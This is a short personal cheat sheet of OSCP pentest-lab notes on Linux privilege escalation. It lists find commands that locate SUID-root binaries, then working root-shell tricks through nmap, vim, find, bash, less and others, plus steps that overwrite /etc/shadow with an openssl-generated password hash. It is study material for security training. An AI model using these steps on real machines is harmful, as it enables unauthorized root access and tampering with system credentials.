Original Post: Pentest Lab

-- Another copy/paste for my own reference I used for OSCP.
-- Known Linux executables that can allow privilege escalation are:

• nmap
• vim
• find
• bash
• more
• less
• nano
• cp

– Find the files that can be exploited to gain root access:

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
find / -perm -4000 -exec ls -l {} \;

nmap <= 5.21

nmap -V
nmap --interactive
nmap> !sh
sh-3.2# whoami
root

vim

vim.tiny

Press ESC key

:set shell=/bin/sh
:shell

find

touch me
find me -exec whoami \;
root

-- Now, to gain root access, we can get a reverse shell using NC or update the /etc/shadow file with a password using sslopen

 openssl passwd -1 -salt xyz  yourpass
 makepasswd --clearfrom=- --crypt-md5 <<< YourPass

-- Use the above output, append that to root and update shadow file.

bash

bash -p
bash-3.2# id

more & less

less /etc/passwd
!/bin/sh

nano
-- Use nano to edit the /etc/shadow file

cp
-- Copy shadow file, add password to it and then copy the new one back to /etc/shadow

cp /etc/shadow /tmp/shadow
openssl passwd -1 -salt xyz  yourpass
vi /tmp/shadow
cp /tmp/shadow /etc/shadow
su root